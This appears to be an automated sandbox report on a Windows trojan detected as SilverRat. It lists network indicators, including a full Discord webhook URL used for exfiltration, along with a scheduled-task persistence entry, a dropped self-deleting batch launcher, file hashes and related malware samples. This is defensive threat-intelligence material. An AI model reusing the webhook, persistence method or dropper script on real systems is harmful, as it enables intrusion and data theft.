http://discord.com | $77HelpPanel.exe, 0000000A.00000002.2615038791.0000000003B26000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://g.top4top.io/p_2522c7w8u | $77HelpPanel.exe, 00000015.00000002.1504049880.0000000003181000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
https://g.top4top.io/p_2522c7w8u1.png | $77HelpPanel.exe, 00000015.00000002.1504049880.0000000003181000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
https://discord.com/api/webhooks/1306009594367180840/Zg6W2rH_yPNkl7Hn5Z-GWjtm8W94xN_PzceHo8g5RjjoNr4 | $77HelpPanel.exe, 00000015.00000002.1504049880.0000000003181000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | YDW0S5K7hi.exe, 00000000.00000002.1404296493.0000000003E44000.00000004.00000800.00020000.00000000.sdmp, $77HelpPanel.exe, 0000000A.00000002.2615038791.00000000039A6000.00000004.00000800.00020000.00000000.sdmp | false | | high
                                  • No. of IPs < 25%
                                  • 25% < No. of IPs < 50%
                                  • 50% < No. of IPs < 75%
                                  • 75% < No. of IPs
IP | Domain | Country | ASN | ASN Name | Malicious
162.159.137.232 | discord.com | United States | 13335 | CLOUDFLARENETUS | false
109.120.138.54 | unknown | Russian Federation | 30968 | INFOBOX-ASInfoboxruAutonomousSystemRU | true
                                  Joe Sandbox version:41.0.0 Charoite
                                  Analysis ID:1555421
                                  Start date and time:2024-11-13 21:10:09 +01:00
                                  Joe Sandbox product:CloudBasic
                                  Overall analysis duration:0h 5m 45s
                                  Hypervisor based Inspection enabled:false
                                  Report type:full
                                  Cookbook file name:default.jbs
                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:27
                                  Number of new started drivers analysed:0
                                  Number of existing processes analysed:0
                                  Number of existing drivers analysed:0
                                  Number of injected processes analysed:0
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • AMSI enabled
                                  Analysis Mode:default
                                  Analysis stop reason:Timeout
                                  Sample name:YDW0S5K7hi.exe
                                  renamed because original name is a hash value
                                  Original Sample Name:078f2f65179647c8a6af688be140138eae827e1f.exe
                                  Detection:MAL
                                  Classification:mal100.troj.spyw.evad.winEXE@32/10@2/2
                                  EGA Information:
                                  • Successful, ratio: 66.7%
                                  HCA Information:
                                  • Successful, ratio: 99%
                                  • Number of executed functions: 16
                                  • Number of non-executed functions: 0
                                  Cookbook Comments:
                                  • Found application associated with file extension: .exe
                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                  • Excluded IPs from analysis (whitelisted): 20.101.57.9
                                  • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.azureedge.net, twc.trafficmanager.net, otelrules.afd.azureedge.net, ctldl.windowsupdate.com, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                                  • Execution Graph export aborted for target $77HelpPanel.exe, PID 2608 because it is empty
• Not all processes were analyzed, report is missing behavior information
                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                  • Report size getting too big, too many NtCreateKey calls found.
                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                  • Report size getting too big, too many NtReadVirtualMemory calls found.
                                  • VT rate limit hit for: YDW0S5K7hi.exe
Time | Type | Description
15:11:22 | API Interceptor | 1x Sleep call for process: YDW0S5K7hi.exe modified
15:11:30 | API Interceptor | 17x Sleep call for process: powershell.exe modified
21:11:29 | Task Scheduler | Run new task: $77HelpPanel.exe path: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe s>"\$77HelpPanel.exe" /AsAdmin
21:11:29 | Task Scheduler | Run new task: HelpPanel_Task-DAILY-21PM path: %MyFile%
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
162.159.137.232 | Xyq6rvzLJs.exe | Get hash | malicious | SilverRat | Browse |
162.159.137.232 | CFuejz2dRu.exe | Get hash | malicious | Discord Token Stealer | Browse |
162.159.137.232 | file.exe | Get hash | malicious | Unknown | Browse |
162.159.137.232 | SecuriteInfo.com.FileRepMalware.22561.28030.exe | Get hash | malicious | Python Stealer, Exela Stealer | Browse |
162.159.137.232 | 570ZenR882.exe | Get hash | malicious | Unknown | Browse |
162.159.137.232 | Ff0ZjqSI9Y.exe | Get hash | malicious | Unknown | Browse |
162.159.137.232 | SecuriteInfo.com.Win32.MalwareX-gen.3620.22364.exe | Get hash | malicious | Unknown | Browse |
162.159.137.232 | EUOgPjsBTC.exe | Get hash | malicious | Unknown | Browse |
162.159.137.232 | webhook.ps1 | Get hash | malicious | Unknown | Browse |
162.159.137.232 | sys_upd.ps1 | Get hash | malicious | Unknown | Browse |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
discord.com | dens.exe | Get hash | malicious | Python Stealer, Exela Stealer, Waltuhium Grabber | Browse | 162.159.128.233
discord.com | Xyq6rvzLJs.exe | Get hash | malicious | SilverRat | Browse | 162.159.137.232
discord.com | 00514DIRyT.exe | Get hash | malicious | GO Stealer | Browse | 162.159.136.232
discord.com | yuki.exe | Get hash | malicious | Luna Stealer | Browse | 162.159.138.232
discord.com | CFuejz2dRu.exe | Get hash | malicious | Discord Token Stealer | Browse | 162.159.135.232
discord.com | CFuejz2dRu.exe | Get hash | malicious | Discord Token Stealer | Browse | 162.159.137.232
discord.com | file.exe | Get hash | malicious | Growtopia | Browse | 162.159.138.232
discord.com | file.exe | Get hash | malicious | Unknown | Browse | 162.159.137.232
discord.com | gMd6of50Do.exe | Get hash | malicious | Blank Grabber | Browse | 162.159.136.232
discord.com | El9HaBFrFM.exe | Get hash | malicious | Blank Grabber | Browse | 162.159.128.233
s-part-0017.t-0009.t-msedge.net | 6GViVt34TK.exe | Get hash | malicious | SilverRat | Browse | 13.107.246.45
s-part-0017.t-0009.t-msedge.net | XE5R2scrKo.exe | Get hash | malicious | SilverRat | Browse | 13.107.246.45
s-part-0017.t-0009.t-msedge.net | file.exe | Get hash | malicious | PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar | Browse | 13.107.246.45
s-part-0017.t-0009.t-msedge.net | file.exe | Get hash | malicious | LummaC | Browse | 13.107.246.45
s-part-0017.t-0009.t-msedge.net | https://bio.to/Q6knqu | Get hash | malicious | Unknown | Browse | 13.107.246.45
s-part-0017.t-0009.t-msedge.net | Launcher 1.0.0.exe | Get hash | malicious | Unknown | Browse | 13.107.246.45
s-part-0017.t-0009.t-msedge.net | https://pthn.airrcofvbc.com/YReXjN/#<EMAIL> | Get hash | malicious | Unknown | Browse | 13.107.246.45
s-part-0017.t-0009.t-msedge.net | Play_VM-Now(Jwright)CQDM.html | Get hash | malicious | HTMLPhisher | Browse | 13.107.246.45
s-part-0017.t-0009.t-msedge.net | https://www.bing.com/ck/a?!&&p=5ceef533778c3decJmltdHM9MTcyMzQyMDgwMCZpZ3VpZD0zNjRmNjVlOC1lNTZjLTYxOWQtMTI1Ny03MTNlZTQyYTYwMTImaW5zaWQ9NTE0MA&ptn=3&ver=2&hsh=3&fclid=364f65e8-e56c-619d-1257-713ee42a6012&u=a1aHR0cHM6Ly9sZXhpbnZhcmlhbnQuY29tLw#aHR0cHM6Ly9wVGhOLmFpcnJjb2Z2YmMuY29tL1lSZVhqTi8=/#<EMAIL> | Get hash | malicious | Unknown | Browse | 13.107.246.45
s-part-0017.t-0009.t-msedge.net | Demande de proposition du Groupe Esp#U00e9rance et Cancer[45838].pdf | Get hash | malicious | Unknown | Browse | 13.107.246.45
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
CLOUDFLARENETUS | nvxdbat.dll.dll | Get hash | malicious | Latrodectus | Browse | 188.114.96.3
CLOUDFLARENETUS | file.exe | Get hash | malicious | PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar | Browse | 172.64.41.3
CLOUDFLARENETUS | https://phisher-parts-production-us-east-1.s3.amazonaws.com/da08a569-c476-4c06-9e6f-9e3c8ae51232/2024-11-13/am8ltkc1mbphloeu0ibap1mm0rjkho1b9lmvvg81/0a2d8971d2f23f8064ed6608cfd357fab0fafbbe0783e460016281e5880a6058?response-content-disposition=attachment%3B%20filename%3D%22original.eml%22%3B%20filename%2A%3DUTF-8%27%27original.eml&X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=ASIA37KREM2QKNAIBCYB%2F20241113%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20241113T195010Z&X-Amz-Expires=1295&X-Amz-Security-Token=IQoJb3JpZ2luX2VjEE8aCXVzLWVhc3QtMSJHMEUCIQDes66x%2BvCQrbr4JurBlxh%2FZwoDTCni9uTYWg1yMkw8tgIgTothHdz21wvRLJB%2FyapL2pjSpo6sjfetIsM92xQR7jIqiAQI1%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw4MjMxOTMyNjU4MjQiDABFVf2%2FdFyB4YBlASrcA1V97UHXoaECeX9WNhXaJ66QhShDmzG2%2BnhXoBnvJ9MSZ3FxSKxy2N312vfT0jX%2BE5TYr%2BvMrecn2z2sXImebnwKpWaSE2k3Jnib62DSuxBl%2BPamZXxx2Zqf0KK0B7I5NnPzVFnq7x986hPj38NgaIpxiSisb1KjZdQD4CafHD6wov5qR1J%2BWFsQZpv1lVIX9hrrZbd2TckXngnmqqbL3933Cu9uR2d6fi4Fa%2BodSVQhlyJUJ1fZQ6f7T3JgDGQ1noG0bjKDC268COJJSzXJF5Dk7lpHgMlqYeQ70Hmo3RSB0r6VEbQ1Pbg033wDv8Z%2Bdrm6s8FQuaEdh9ChgB5rug5qXSxc1RTtjRvLnojXQoXRMoGmKYUj%2FduDkSPDQNFR5cHODQjiZFT9IWFxoHk8XJBZXRmTQwiB2TpVzclYAuXORIl9MkLYPp120X6S%2FgCfUlAWZS3Hz9Im%2FhkcTYOiIlUyWPMSReAlGbzLfoT9ND4RJ6usv9EucqIl88Fwkd0ijQf4D3FNYUy2%2BoCu5rSsBMF9rsGkiFUWudPGgjhet3mjcjym4mGGOwYX11H2Pglw%2FABHybbWlRc2CuBjINcCEt0TFuHqO1J2mnw8fpUjMpEwW6o1FShICEc3rDA%2BMKHn0rkGOqUB4xGwEdpTafHkFGGqxzPNpkDcZfnnaU%2FAbOCkGXpyMUhW517qD4FJAmQp%2Bfnl96Tnibf8swoM4SIisjl2jnb%2FU0kq%2BmrN6TFSuMgCgTVQQHcK3ExoKVHLZjrL6%2Bhxh1TzP%2Bpf9ubLwUBMdlqYEKa7N2RQt4hz7n1zW4y%2BMIQEX1vvQuzUBZyYp1XE4j2LT8EAeuznKfcLOqeqoRaUMVe2ofiZ55vf&X-Amz-SignedHeaders=host&X-Amz-Signature=ccc669f52c34a8e1dc4626cae26b2cda7c06245991a7c2f0f6ae3366ae332565 | Get hash | malicious | Unknown | Browse | 104.17.25.14
CLOUDFLARENETUS | Launcher 1.0.0.exe | Get hash | malicious | Unknown | Browse | 172.64.41.3
CLOUDFLARENETUS | file.exe | Get hash | malicious | LummaC | Browse | 104.21.80.55
CLOUDFLARENETUS | https://bio.to/Q6knqu | Get hash | malicious | Unknown | Browse | 104.17.25.14
CLOUDFLARENETUS | Launcher 1.0.0.exe | Get hash | malicious | Unknown | Browse | 172.64.41.3
CLOUDFLARENETUS | https://trckacbm.com/url/ver/714099389/2931216/e7443d1a99daced93ca033af62f22f12 | Get hash | malicious | Unknown | Browse | 104.17.25.14
CLOUDFLARENETUS | https://autoplay-voice-inout-transcribe.github.io/teams.voicemail.assistant/ | Get hash | malicious | Unknown | Browse | 188.114.96.3
CLOUDFLARENETUS | Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.exe | Get hash | malicious | Unknown | Browse | 1.1.1.1
INFOBOX-ASInfoboxruAutonomousSystemRU | botnet.x86.elf | Get hash | malicious | Mirai, Moobot | Browse | 92.243.83.22
INFOBOX-ASInfoboxruAutonomousSystemRU | boatnet.arm.elf | Get hash | malicious | Mirai | Browse | 77.221.151.63
INFOBOX-ASInfoboxruAutonomousSystemRU | boatnet.mips.elf | Get hash | malicious | Mirai | Browse | 77.221.151.63
INFOBOX-ASInfoboxruAutonomousSystemRU | boatnet.x86.elf | Get hash | malicious | Mirai | Browse | 77.221.151.63
INFOBOX-ASInfoboxruAutonomousSystemRU | boatnet.ppc.elf | Get hash | malicious | Mirai | Browse | 77.221.151.63
INFOBOX-ASInfoboxruAutonomousSystemRU | boatnet.sh4.elf | Get hash | malicious | Mirai | Browse | 77.221.151.63
INFOBOX-ASInfoboxruAutonomousSystemRU | boatnet.arm7.elf | Get hash | malicious | Mirai | Browse | 77.221.151.63
INFOBOX-ASInfoboxruAutonomousSystemRU | boatnet.spc.elf | Get hash | malicious | Mirai | Browse | 77.221.151.63
INFOBOX-ASInfoboxruAutonomousSystemRU | boatnet.mpsl.elf | Get hash | malicious | Mirai | Browse | 77.221.151.63
INFOBOX-ASInfoboxruAutonomousSystemRU | boatnet.m68k.elf | Get hash | malicious | Mirai | Browse | 77.221.151.63
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
3b5074b1b5d032e5620f69f9f700ff0e | 6GViVt34TK.exe | Get hash | malicious | SilverRat | Browse | 162.159.137.232
3b5074b1b5d032e5620f69f9f700ff0e | file.exe | Get hash | malicious | PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar | Browse | 162.159.137.232
3b5074b1b5d032e5620f69f9f700ff0e | file.exe | Get hash | malicious | LummaC | Browse | 162.159.137.232
3b5074b1b5d032e5620f69f9f700ff0e | Play_VM-Now(Bfassl)CLQD.html | Get hash | malicious | Unknown | Browse | 162.159.137.232
3b5074b1b5d032e5620f69f9f700ff0e | Play_VM-Now(Difioreconstruction)CLQD.html | Get hash | malicious | Unknown | Browse | 162.159.137.232
3b5074b1b5d032e5620f69f9f700ff0e | file.exe | Get hash | malicious | LummaC | Browse | 162.159.137.232
3b5074b1b5d032e5620f69f9f700ff0e | Support.Client (1).exe | Get hash | malicious | ScreenConnect Tool | Browse | 162.159.137.232
3b5074b1b5d032e5620f69f9f700ff0e | file.exe | Get hash | malicious | PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar | Browse | 162.159.137.232
3b5074b1b5d032e5620f69f9f700ff0e | Support.Client (1).exe | Get hash | malicious | ScreenConnect Tool | Browse | 162.159.137.232
3b5074b1b5d032e5620f69f9f700ff0e | https://zillow-online.com/realestate/one/drive/docs/ | Get hash | malicious | HTMLPhisher | Browse | 162.159.137.232
                                                      No context
                                                      Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe
                                                      File Type:CSV text
                                                      Category:dropped
                                                      Size (bytes):859
                                                      Entropy (8bit):5.379735105545312
                                                      Encrypted:false
                                                      SSDEEP:24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6Khk:MxHKQ71qHGIs0HKCYHKGSI6ok
                                                      MD5:66903BF8F31D4DE1B691C99CF8812A8A
                                                      SHA1:6A49612CB1C2356F176B1B2E5481FB3CD0CB4289
                                                      SHA-256:C09B65A3BA4819DAA12705C8C48400AD8F80B3B779954C14B9679396D252AF42
                                                      SHA-512:A96F5D88E7B7A1C36D77AA9A42CA3513B70261F9B494F387A46F1DA01934E05F9659A0E8512D677DFC8602254C230CC7F370A83B916C329F908B645C5A2C247D
                                                      Malicious:false
                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..
                                                      Process:C:\Users\user\Desktop\YDW0S5K7hi.exe
                                                      File Type:CSV text
                                                      Category:dropped
                                                      Size (bytes):1088
                                                      Entropy (8bit):5.389928136181357
                                                      Encrypted:false
                                                      SSDEEP:24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6Kh6+84xp3/VclT:MxHKQ71qHGIs0HKCYHKGSI6o6+vxp3/E
                                                      MD5:6B2359BF987F4BDAF6CB014F63217859
                                                      SHA1:3894B16E010FEFF2E71BEE0274746FC34C57C1DF
                                                      SHA-256:ED763CED7BDAE1851B6A82D1D3685E9CC94937ADADD492DD2C1AC0AB639227FD
                                                      SHA-512:C440BE0810F8CF29ADB6E816DA07A673C1E60E926926B2E863AFE7529C2D5EDB6118335C535CD0B4F0F7D7D6E5FE9801328A37FA4012F7D4B737F6F099A1489D
                                                      Malicious:true
                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):64
                                                      Entropy (8bit):1.1510207563435464
                                                      Encrypted:false
                                                      SSDEEP:3:NlllulTkklh:NllUokl
                                                      MD5:8F489B5B8555D6E9737E8EE991AA32FD
                                                      SHA1:05B412B1818DDB95025A6580D9E1F3845F6A2AFC
                                                      SHA-256:679D924F42E8FC107A7BE221DE26CCFEBF98633EA2454D3B4E0D82ED66E3E03D
                                                      SHA-512:97521122A5B64237EF3057A563284AC5C0D3354E8AC5AA0DE2E2FA61BA63379091200D1C4A36FABC16B049E83EF11DBB62E1987A6E4D6A4BCD5DDB27E7BD9F49
                                                      Malicious:false
                                                      Preview:@...e................................................@..........
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                      Process:C:\Users\user\Desktop\YDW0S5K7hi.exe
                                                      File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):202
                                                      Entropy (8bit):5.154561466644995
                                                      Encrypted:false
                                                      SSDEEP:6:hWKqTtT6cNwiaZ5SuH1mQdJ70Gvmq1cNwi23fTXBSk:wdtTsNHSuVzH0G+iZLX/
                                                      MD5:AD74140DF773B21B222835AB9DB1C643
                                                      SHA1:65C544AA7C8A647262544FBFC630E2B1B09062DB
                                                      SHA-256:7A09E723939D1AE14A121061E0711D3864CB069B64D9BAEE6707C119DF656A4E
                                                      SHA-512:481295D97E41F7C6AA6837FBC25E122B481BDC9698BFB186DA6EE0F2834FAD1904EB3C9C60C08D9A6F4C25437CE05CD594A90E9CA649EC9CF28EE22AD8036F83
                                                      Malicious:false
                                                      Preview:@echo off..timeout 3 > NUL..START "" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe"..CD C:\Users\user\AppData\Local\Temp\..DEL "tmp9C90.tmp.bat" /f /q..
                                                      Process:C:\Users\user\Desktop\YDW0S5K7hi.exe
                                                      File Type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):46080
                                                      Entropy (8bit):5.5455244016017495
                                                      Encrypted:false
                                                      SSDEEP:768:yWfoI5XPDHzT8d7tGx0cTIIW/pNCypKbmRUT0d9S5QynqjB6SQne6vrR/HNh:yWRk7tGPs1DCypKCGAd9Uqjoxe6F/HNh
                                                      MD5:FE4EE341B4E7E0D03E27893BD6070A3E
                                                      SHA1:078F2F65179647C8A6AF688BE140138EAE827E1F
                                                      SHA-256:FD32B776EDD0656AD550B2A4981897515F5F2C793EB3D80DA8FCD04F98B12222
                                                      SHA-512:FA0B4D10DB62E06C782B09B2BD40974EC990EBF02D8A8E8F5E0932CC6CC2E91071129392A9FEB57A4F33868D25F31901A2F884E54821451BA9C8D70AE420DA7C
                                                      Malicious:true
                                                      Yara Hits:
                                                      • Rule: JoeSecurity_SilverRat, Description: Yara detected SilverRat, Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe, Author: Joe Security
                                                      Antivirus:
                                                      • Antivirus: Avira, Detection: 100%
                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                      • Antivirus: ReversingLabs, Detection: 61%
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.....3g.........."...................... .....@..... ....................................@...@......@............... ............................................................................................................................... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc..............................@..BH........[...n...................................................................(r...*..0............+. ....(......X...(....2.(....-..(....(....-..(....+. ....(......&..(....,.($...(....(....s......r...po.....r...pr...p(....o....o......o......o.....(....&..&..(W...(......&..~....-........s.........~....s....(......&..(C...-.(N...(K.....&..~....(....(....+...@....7..C........\.B.........(.............).....................(....*.0..........(....~....(....o.........~....(....s........
                                                      Process:C:\Windows\System32\timeout.exe
                                                      File Type:ASCII text, with CRLF line terminators, with overstriking
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.41440934524794
                                                      Encrypted:false
                                                      SSDEEP:3:hYFqdLGAR+mQRKVxLZXt0sn:hYFqGaNZKsn
                                                      MD5:3DD7DD37C304E70A7316FE43B69F421F
                                                      SHA1:A3754CFC33E9CA729444A95E95BCB53384CB51E4
                                                      SHA-256:4FA27CE1D904EA973430ADC99062DCF4BAB386A19AB0F8D9A4185FA99067F3AA
                                                      SHA-512:713533E973CF0FD359AC7DB22B1399392C86D9FD1E715248F5724AAFBBF0EEB5EAC0289A0E892167EB559BE976C2AD0A0A0D8EFC407FFAF5B3C3A32AA9A0AAA4
                                                      Malicious:false
                                                      Preview:..Waiting for 3 seconds, press a key to continue ....2.1.0..
                                                      File type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
                                                      Entropy (8bit):5.5455244016017495
                                                      TrID:
                                                      • Win64 Executable GUI (202006/5) 92.65%
                                                      • Win64 Executable (generic) (12005/4) 5.51%
                                                      • Generic Win/DOS Executable (2004/3) 0.92%
                                                      • DOS Executable Generic (2002/1) 0.92%
                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                      File name:YDW0S5K7hi.exe
                                                      File size:46'080 bytes
                                                      MD5:fe4ee341b4e7e0d03e27893bd6070a3e
                                                      SHA1:078f2f65179647c8a6af688be140138eae827e1f
                                                      SHA256:fd32b776edd0656ad550b2a4981897515f5f2c793eb3d80da8fcd04f98b12222
                                                      SHA512:fa0b4d10db62e06c782b09b2bd40974ec990ebf02d8a8e8f5e0932cc6cc2e91071129392a9feb57a4f33868d25f31901a2f884e54821451ba9c8d70ae420da7c
                                                      SSDEEP:768:yWfoI5XPDHzT8d7tGx0cTIIW/pNCypKbmRUT0d9S5QynqjB6SQne6vrR/HNh:yWRk7tGPs1DCypKCGAd9Uqjoxe6F/HNh
                                                      TLSH:E0235C007BDC8279E7BE1B7C99F1022646B9F1631512E78E4CC841EA1D277C98B85BF6
                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.....3g.........."...................... .....@..... ....................................@...@......@............... .....
                                                      Icon Hash:00928e8e8686b000
                                                      Entrypoint:0x140000000
                                                      Entrypoint Section:
                                                      Digitally signed:false
                                                      Imagebase:0x140000000
                                                      Subsystem:windows gui
                                                      Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                      Time Stamp:0x6733D1DC [Tue Nov 12 22:08:28 2024 UTC]
                                                      TLS Callbacks:
                                                      CLR (.Net) Version:
                                                      OS Version Major:4
                                                      OS Version Minor:0
                                                      File Version Major:4
                                                      File Version Minor:0
                                                      Subsystem Version Major:4
                                                      Subsystem Version Minor:0
                                                      Import Hash:
                                                      Instruction
                                                      dec ebp
                                                      pop edx
                                                      nop
                                                      add byte ptr [ebx], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax+eax], al
                                                      add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xe000 | 0x4d0 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | -
